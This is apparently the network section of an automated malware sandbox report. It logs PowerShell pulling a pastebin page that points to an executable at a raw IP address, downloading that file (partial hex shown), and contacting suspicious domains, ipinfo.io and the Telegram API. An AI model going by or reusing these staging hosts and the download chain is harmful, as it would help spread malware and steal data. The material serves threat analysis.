Nov 23, 2024 12:47:56.542588949 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:56.542614937 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:56.542676926 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:56.545764923 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:56.545777082 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:57.771300077 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:57.771384001 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:57.781701088 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:57.781712055 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:57.782094002 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:57.788729906 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:57.835376024 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:58.284928083 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:58.285104036 CET	443	49764	34.117.59.81	192.168.2.4
Nov 23, 2024 12:47:58.285257101 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:47:58.285904884 CET	49764	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:03.648616076 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:03.648691893 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:03.648838043 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:03.655797958 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:03.655833006 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:04.957367897 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:04.957473993 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:04.959810019 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:04.959834099 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:04.960046053 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:04.985651016 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:05.027368069 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:05.348206043 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:05.348246098 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:05.348476887 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:05.352118015 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:05.352142096 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:05.438040018 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:05.438092947 CET	443	49780	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:05.438177109 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:05.439105034 CET	49780	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:06.614372969 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:06.614448071 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:06.616636038 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:06.616656065 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:06.616874933 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:06.623769045 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:06.667341948 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:07.077677965 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:07.077760935 CET	443	49782	34.117.59.81	192.168.2.4
Nov 23, 2024 12:48:07.077835083 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:07.082417011 CET	49782	443	192.168.2.4	34.117.59.81
Nov 23, 2024 12:48:16.668375015 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:16.668416023 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:16.668463945 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:16.687097073 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:16.687112093 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.157990932 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.158061028 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.160229921 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.160244942 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.160567045 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.169640064 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.215328932 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.420772076 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.420809031 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.420921087 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.423573971 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.423585892 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.753211975 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.753350973 CET	443	49808	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:18.753407001 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:18.754398108 CET	49808	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:19.882674932 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:19.882774115 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:19.885060072 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:19.885077000 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:19.885416031 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:19.894121885 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:19.939341068 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:20.561125040 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:20.561280012 CET	443	49814	149.154.167.220	192.168.2.4
Nov 23, 2024 12:48:20.561331987 CET	49814	443	192.168.2.4	149.154.167.220
Nov 23, 2024 12:48:20.562442064 CET	49814	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 12:47:09.682238102 CET	56711	53	192.168.2.4	1.1.1.1
Nov 23, 2024 12:47:09.833345890 CET	53	56711	1.1.1.1	192.168.2.4
Nov 23, 2024 12:47:23.653245926 CET	64241	53	192.168.2.4	1.1.1.1
Nov 23, 2024 12:47:23.884520054 CET	53	64241	1.1.1.1	192.168.2.4
Nov 23, 2024 12:47:26.111582994 CET	51634	53	192.168.2.4	1.1.1.1
Nov 23, 2024 12:47:26.573940992 CET	53	51634	1.1.1.1	192.168.2.4
Nov 23, 2024 12:47:53.793457985 CET	55589	53	192.168.2.4	1.1.1.1
Nov 23, 2024 12:47:53.930401087 CET	53	55589	1.1.1.1	192.168.2.4
Nov 23, 2024 12:48:16.512212038 CET	63191	53	192.168.2.4	1.1.1.1
Nov 23, 2024 12:48:16.650183916 CET	53	63191	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 12:47:09.682238102 CET	192.168.2.4	1.1.1.1	0x488	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:23.653245926 CET	192.168.2.4	1.1.1.1	0x483f	Standard query (0)	revirepart.biz	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:26.111582994 CET	192.168.2.4	1.1.1.1	0xf1d8	Standard query (0)	frogs-severz.sbs	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:53.793457985 CET	192.168.2.4	1.1.1.1	0xd887	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:48:16.512212038 CET	192.168.2.4	1.1.1.1	0x81c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 12:47:09.833345890 CET	1.1.1.1	192.168.2.4	0x488	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:09.833345890 CET	1.1.1.1	192.168.2.4	0x488	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:09.833345890 CET	1.1.1.1	192.168.2.4	0x488	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:23.884520054 CET	1.1.1.1	192.168.2.4	0x483f	No error (0)	revirepart.biz	172.67.184.174	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:23.884520054 CET	1.1.1.1	192.168.2.4	0x483f	No error (0)	revirepart.biz	104.21.43.198	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:26.573940992 CET	1.1.1.1	192.168.2.4	0xf1d8	No error (0)	frogs-severz.sbs	104.21.88.250	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:26.573940992 CET	1.1.1.1	192.168.2.4	0xf1d8	No error (0)	frogs-severz.sbs	172.67.155.47	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:47:53.930401087 CET	1.1.1.1	192.168.2.4	0xd887	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)	false
Nov 23, 2024 12:48:16.650183916 CET	1.1.1.1	192.168.2.4	0x81c	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

revirepart.biz

frogs-severz.sbs

ipinfo.io

api.telegram.org

192.81.132.76

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	192.81.132.76	80	7516	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 12:47:14.100522995 CET	68	OUT	GET /b.exe HTTP/1.1 Host: 192.81.132.76 Connection: Keep-Alive
Nov 23, 2024 12:47:15.408783913 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 22 Nov 2024 15:53:53 GMT ETag: "af000-6278263cd54f1" Accept-Ranges: bytes Content-Length: 716800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELr@g0` @ @&W @@` Hm@ka\ @.text `.rsrc@ @@.reloc@@B` `
Nov 23, 2024 12:47:15.408909082 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2OX.UO6d#~EC%#77G>2m\,FeO?k:C3frbu,7Y46cTJt2ufAS8+Rlk75
Nov 23, 2024 12:47:15.408962011 CET	1236	IN	Data Raw: 36 82 84 90 41 b8 a3 74 d1 0e 94 75 d7 78 1d ed a4 1a 85 69 8b 7f 86 2a b9 3d d3 8d 22 64 9c 86 1b a8 89 36 b4 4d 62 60 93 34 b6 da 85 52 51 31 47 b5 3e 77 e3 29 9f 60 e5 2d 4f eb c5 70 1c ee 61 13 04 30 1d 19 81 0c 63 a7 8b 93 ea 89 df 9e 0f ae Data Ascii: 6Atuxi*="d6Mb`4RQ1G>w)`-Opa0cG9(R=n#%<gBa"UL"m9)_S!y<6_$qE70O>ZAz_Xoib'27crootohzMurCS~
Nov 23, 2024 12:47:15.408998013 CET	1236	IN	Data Raw: 08 78 7d 58 78 36 b2 08 a6 ba 33 46 85 7a 96 2a c2 08 c0 c1 93 39 6d 49 5b dd f6 54 14 ce 84 2a 58 6e f4 ae 1a a4 27 05 68 ea fb 69 14 0f ad 77 e2 cd 86 f4 f8 83 10 d7 ae 61 a5 15 f9 7f 7b 96 a2 75 41 f7 62 ab 0e 27 07 37 b9 e5 27 4d 5a 01 1b c5 Data Ascii: x}Xx63Fz9mI[TXn'hiwa{uAb'7'MZ5q}8qcY$A1zKxF4\|GZVD8D]^JA}_TJ7;\|rqQf}_9Z#a16ByL6cUKk3w!~
Nov 23, 2024 12:47:15.409032106 CET	1236	IN	Data Raw: b8 b8 30 a9 2e d6 df 3e 2c 98 0b 25 b2 87 c0 eb a7 ea 28 d8 b8 5c 22 f6 03 27 a3 43 14 48 05 67 22 44 7c 3c 92 11 9f 8e c8 16 8e 04 8f 71 c8 07 82 37 2c 47 d2 5f 11 2a 7f c9 2f 83 6e a7 35 4f 40 04 9d 04 88 0b e3 1e 8d 3e 68 1f 7e 2e 8b 5e a9 e7 Data Ascii: 0.>,%(\"'CHg"D\|<q7,G_*/n5O@>h~.^w."7TYSSZ)4Q~fIw(~6>1t>_;R'bFJr$R&buv&VOH(gxzu}3(:!U4h+0s
Nov 23, 2024 12:47:15.409065008 CET	1236	IN	Data Raw: fb 76 b8 0f 86 fc a1 96 50 10 67 7d 0a 1a 98 cc b3 fd 2c 2a 3d d3 38 4b 2d a6 36 d2 dc 8b 69 d5 8a d7 08 69 cd cf c1 96 81 70 2f 31 57 ff 70 04 64 a4 47 09 36 f4 38 5e e8 5b 9a 0e af 29 02 50 dc 6b 1b 2e 27 f1 2e 08 d1 ad 6a dd ad 84 76 5c ee 10 Data Ascii: vPg},=8K-6iip/1WpdG68^[)Pk.'.jv\\:[i-j/pb[EY,ak2'x{eO3"5U~[oxW39+.8'\F\|j\bRLnhRK
Nov 23, 2024 12:47:15.409099102 CET	1236	IN	Data Raw: e1 65 2c 1e bc e1 86 99 98 dd e1 6b dc 1e 6f 12 7a 8f b6 c4 7d a0 01 e2 87 70 8c 97 ed 82 9d d4 24 5f 8c aa c7 31 ec a9 76 c0 95 53 97 ee ff 3b 83 46 41 ed f4 a9 99 de 68 8b aa 5e cb 22 ab ae fb 9a b0 80 a6 7e 4b b1 33 41 f5 54 25 93 42 ad 22 12 Data Ascii: e,koz}p$_1vS;FAh^"~K3AT%B":@]y!~ 8*PP=F1Muy7W<,&15KSzYA9kyO~\bK:oocuuU%e:U@5"
Nov 23, 2024 12:47:15.409133911 CET	1236	IN	Data Raw: e5 18 55 4a aa d7 33 72 a3 f9 bf 87 05 fe d3 81 15 05 cc 7f be 45 ce 96 d0 df b4 aa b9 4d b6 06 ce 96 cf cd a7 23 63 ea 3d 3f a2 9f 83 8e e2 17 9b 65 5a 50 07 ec d5 fd c1 58 96 2e 06 3c ef cd c6 d4 e9 5e ec ab 04 41 04 f7 0d d6 18 13 a7 63 3b fb Data Ascii: UJ3rEM#c=?eZPX.<^Ac;aUP QL,uv0Yj(U'qe [Ng.hP/VS,iRM8]GcV=d/qZAlbu?2d
Nov 23, 2024 12:47:15.409166098 CET	1236	IN	Data Raw: 9d 15 8e 41 90 fa 93 18 f1 55 fe 40 37 eb 6e 9d b9 2f 98 be a9 7d 72 78 c7 29 2f 9b d7 56 ac 94 f8 b0 cc 3f 2c 92 83 42 37 2c 99 75 04 1f f3 81 34 89 65 24 ac 36 b4 be 48 e5 72 d0 61 63 41 36 3e ca f5 c0 19 ce 68 8a f9 2e f2 21 a0 b7 79 39 01 ab Data Ascii: AU@7n/}rx)/V?,B7,u4e$6HracA6>h.!y9[dO'#St0f~(g$^mdXt\| ak;DN8LfAsFj$)D\9.[nft4\|f;{%G+)j@9,>]2
Nov 23, 2024 12:47:15.409200907 CET	1236	IN	Data Raw: 8e ea 2f 03 f0 4e 3c 0d 28 0f f8 a0 94 ff 44 f5 57 3f a2 4e 40 5d 02 68 cd 3d df fa 75 43 a7 51 fe 66 f3 31 48 83 48 73 3e cb 8b 84 ce 26 a7 0f 43 f2 b9 9f 88 73 b6 17 20 b8 14 e0 b5 74 e7 45 16 d6 10 9d 71 45 a0 d2 d1 34 fc 7e fe 85 17 51 d3 73 Data Ascii: /N<(DW?N@]h=uCQf1HHs>&Cs tEqE4~QsvsBxwg\|]@vvE]a-2ZD,mVKf04Gs@#-brjR$';d"`xUxQptbL(~V-}K?e:F0?
Nov 23, 2024 12:47:15.528908014 CET	1236	IN	Data Raw: 3a 35 d6 4d ee 00 86 b0 47 02 7a f9 05 c7 a8 86 64 1b 0e 5d 40 f1 b6 db 85 96 75 bd f3 ab 64 3c 8b cd 90 4b d6 6a 90 1a 4a b4 15 c0 d9 2c c3 ba 0a d2 dc 99 f1 e4 8c 51 62 de 6d 46 81 d7 13 15 93 aa 2b 58 0d 78 42 b1 50 53 bc e8 4f 50 35 1d 52 50 Data Ascii: :5MGzd]@ud<KjJ,QbmF+XxBPSOP5RPMe'3 HGh..+1DO3FhC\>0O+\>)I=T&o{5&.w\oV-0y^NG5z^U~}$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	192.81.132.76	80	7664	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 12:47:15.810266972 CET	68	OUT	GET /b.exe HTTP/1.1 Host: 192.81.132.76 Connection: Keep-Alive
Nov 23, 2024 12:47:17.080240011 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 22 Nov 2024 15:53:53 GMT ETag: "af000-6278263cd54f1" Accept-Ranges: bytes Content-Length: 716800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELr@g0` @ @&W @@` Hm@ka\ @.text `.rsrc@ @@.reloc@@B` `
Nov 23, 2024 12:47:17.080307961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2OX.UO6d#~EC%#77G>2m\,FeO?k:C3frbu,7Y46cTJt2ufAS8+Rlk75
Nov 23, 2024 12:47:17.080346107 CET	1236	IN	Data Raw: 36 82 84 90 41 b8 a3 74 d1 0e 94 75 d7 78 1d ed a4 1a 85 69 8b 7f 86 2a b9 3d d3 8d 22 64 9c 86 1b a8 89 36 b4 4d 62 60 93 34 b6 da 85 52 51 31 47 b5 3e 77 e3 29 9f 60 e5 2d 4f eb c5 70 1c ee 61 13 04 30 1d 19 81 0c 63 a7 8b 93 ea 89 df 9e 0f ae Data Ascii: 6Atuxi*="d6Mb`4RQ1G>w)`-Opa0cG9(R=n#%<gBa"UL"m9)_S!y<6_$qE70O>ZAz_Xoib'27crootohzMurCS~
Nov 23, 2024 12:47:17.080399990 CET	1236	IN	Data Raw: 08 78 7d 58 78 36 b2 08 a6 ba 33 46 85 7a 96 2a c2 08 c0 c1 93 39 6d 49 5b dd f6 54 14 ce 84 2a 58 6e f4 ae 1a a4 27 05 68 ea fb 69 14 0f ad 77 e2 cd 86 f4 f8 83 10 d7 ae 61 a5 15 f9 7f 7b 96 a2 75 41 f7 62 ab 0e 27 07 37 b9 e5 27 4d 5a 01 1b c5 Data Ascii: x}Xx63Fz9mI[TXn'hiwa{uAb'7'MZ5q}8qcY$A1zKxF4\|GZVD8D]^JA}_TJ7;\|rqQf}_9Z#a16ByL6cUKk3w!~
Nov 23, 2024 12:47:17.080432892 CET	1236	IN	Data Raw: b8 b8 30 a9 2e d6 df 3e 2c 98 0b 25 b2 87 c0 eb a7 ea 28 d8 b8 5c 22 f6 03 27 a3 43 14 48 05 67 22 44 7c 3c 92 11 9f 8e c8 16 8e 04 8f 71 c8 07 82 37 2c 47 d2 5f 11 2a 7f c9 2f 83 6e a7 35 4f 40 04 9d 04 88 0b e3 1e 8d 3e 68 1f 7e 2e 8b 5e a9 e7 Data Ascii: 0.>,%(\"'CHg"D\|<q7,G_*/n5O@>h~.^w."7TYSSZ)4Q~fIw(~6>1t>_;R'bFJr$R&buv&VOH(gxzu}3(:!U4h+0s
Nov 23, 2024 12:47:17.080466986 CET	1236	IN	Data Raw: fb 76 b8 0f 86 fc a1 96 50 10 67 7d 0a 1a 98 cc b3 fd 2c 2a 3d d3 38 4b 2d a6 36 d2 dc 8b 69 d5 8a d7 08 69 cd cf c1 96 81 70 2f 31 57 ff 70 04 64 a4 47 09 36 f4 38 5e e8 5b 9a 0e af 29 02 50 dc 6b 1b 2e 27 f1 2e 08 d1 ad 6a dd ad 84 76 5c ee 10 Data Ascii: vPg},=8K-6iip/1WpdG68^[)Pk.'.jv\\:[i-j/pb[EY,ak2'x{eO3"5U~[oxW39+.8'\F\|j\bRLnhRK
Nov 23, 2024 12:47:17.080499887 CET	1236	IN	Data Raw: e1 65 2c 1e bc e1 86 99 98 dd e1 6b dc 1e 6f 12 7a 8f b6 c4 7d a0 01 e2 87 70 8c 97 ed 82 9d d4 24 5f 8c aa c7 31 ec a9 76 c0 95 53 97 ee ff 3b 83 46 41 ed f4 a9 99 de 68 8b aa 5e cb 22 ab ae fb 9a b0 80 a6 7e 4b b1 33 41 f5 54 25 93 42 ad 22 12 Data Ascii: e,koz}p$_1vS;FAh^"~K3AT%B":@]y!~ 8*PP=F1Muy7W<,&15KSzYA9kyO~\bK:oocuuU%e:U@5"
Nov 23, 2024 12:47:17.080533981 CET	1236	IN	Data Raw: e5 18 55 4a aa d7 33 72 a3 f9 bf 87 05 fe d3 81 15 05 cc 7f be 45 ce 96 d0 df b4 aa b9 4d b6 06 ce 96 cf cd a7 23 63 ea 3d 3f a2 9f 83 8e e2 17 9b 65 5a 50 07 ec d5 fd c1 58 96 2e 06 3c ef cd c6 d4 e9 5e ec ab 04 41 04 f7 0d d6 18 13 a7 63 3b fb Data Ascii: UJ3rEM#c=?eZPX.<^Ac;aUP QL,uv0Yj(U'qe [Ng.hP/VS,iRM8]GcV=d/qZAlbu?2d
Nov 23, 2024 12:47:17.080566883 CET	1236	IN	Data Raw: 9d 15 8e 41 90 fa 93 18 f1 55 fe 40 37 eb 6e 9d b9 2f 98 be a9 7d 72 78 c7 29 2f 9b d7 56 ac 94 f8 b0 cc 3f 2c 92 83 42 37 2c 99 75 04 1f f3 81 34 89 65 24 ac 36 b4 be 48 e5 72 d0 61 63 41 36 3e ca f5 c0 19 ce 68 8a f9 2e f2 21 a0 b7 79 39 01 ab Data Ascii: AU@7n/}rx)/V?,B7,u4e$6HracA6>h.!y9[dO'#St0f~(g$^mdXt\| ak;DN8LfAsFj$)D\9.[nft4\|f;{%G+)j@9,>]2
Nov 23, 2024 12:47:17.080604076 CET	1236	IN	Data Raw: 8e ea 2f 03 f0 4e 3c 0d 28 0f f8 a0 94 ff 44 f5 57 3f a2 4e 40 5d 02 68 cd 3d df fa 75 43 a7 51 fe 66 f3 31 48 83 48 73 3e cb 8b 84 ce 26 a7 0f 43 f2 b9 9f 88 73 b6 17 20 b8 14 e0 b5 74 e7 45 16 d6 10 9d 71 45 a0 d2 d1 34 fc 7e fe 85 17 51 d3 73 Data Ascii: /N<(DW?N@]h=uCQf1HHs>&Cs tEqE4~QsvsBxwg\|]@vvE]a-2ZD,mVKf04Gs@#-brjR$';d"`xUxQptbL(~V-}K?e:F0?
Nov 23, 2024 12:47:17.207199097 CET	1236	IN	Data Raw: 3a 35 d6 4d ee 00 86 b0 47 02 7a f9 05 c7 a8 86 64 1b 0e 5d 40 f1 b6 db 85 96 75 bd f3 ab 64 3c 8b cd 90 4b d6 6a 90 1a 4a b4 15 c0 d9 2c c3 ba 0a d2 dc 99 f1 e4 8c 51 62 de 6d 46 81 d7 13 15 93 aa 2b 58 0d 78 42 b1 50 53 bc e8 4f 50 35 1d 52 50 Data Ascii: :5MGzd]@ud<KjJ,QbmF+XxBPSOP5RPMe'3 HGh..+1DO3FhC\>0O+\>)I=T&o{5&.w\oV-0y^NG5z^U~}$

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.20.3.235	443	7516	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:11 UTC	74	OUT	GET /raw/NQfY14gm HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-11-23 11:47:12 UTC	388	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:12 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sat, 23 Nov 2024 11:47:12 GMT Server: cloudflare CF-RAY: 8e70ec4d9d23c323-EWR
2024-11-23 11:47:12 UTC	32	IN	Data Raw: 31 61 0d 0a 68 74 74 70 3a 2f 2f 31 39 32 2e 38 31 2e 31 33 32 2e 37 36 2f 62 2e 65 78 65 0d 0a Data Ascii: 1ahttp://192.81.132.76/b.exe
2024-11-23 11:47:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.20.3.235	443	7516	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:13 UTC	50	OUT	GET /raw/NQfY14gm HTTP/1.1 Host: pastebin.com
